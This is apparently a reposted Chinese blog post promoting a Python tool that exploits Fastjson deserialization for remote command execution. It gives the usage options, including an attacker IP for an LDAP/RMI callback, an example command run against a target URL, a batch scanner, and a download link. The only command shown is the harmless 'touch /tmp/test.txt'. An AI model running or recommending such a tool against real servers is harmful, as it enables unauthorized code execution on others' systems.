fastjson一键命令执行工具

admin 2024年11月5日13:33:11评论6 views字数 689阅读2分17秒阅读模式

fastjson一键命令执行

亲爱的读者,我们诚挚地提醒您,黑熊安全公众号的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。黑熊安全团队及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

usage: Fastjson one-key command is executed! [-h] [-u URL] [-s SELF] [-c COMMAMD]

python3 fastjson.py -u [Target Url] -s [self IP] -c [command]

optional arguments:

-h, --help            show this help message and exit

-u URL, --url URL     漏洞url

-s SELF, --self SELF  自己IP,如果是VPS请输入公网IP

-c COMMAMD, --commamd COMMAMD 执行的命令,有空格请加上双引号

-m [MODE], --mode [MODE]  选择执行模式(可选),1:ldap模式(默认);2:rmi模式

python3 fastjson.py -u http://192.168.1.3/ -s 192.168.1.1 -c "touch /tmp/test.txt

使用截图:

fastjson一键命令执行工具

fastjson一键命令执行工具

批量检测链接放target.txt中。usage:python3 fastjson_check.py

fastjson一键命令执行工具

下载链接:

https://github.com/mrknow001/fastjson_rec_exploit

原文始发于微信公众号(黑熊安全):fastjson一键命令执行工具

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月5日13:33:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   fastjson一键命令执行工具http://cn-sec.com/archives/3357903.html

发表评论

匿名网友 填写信息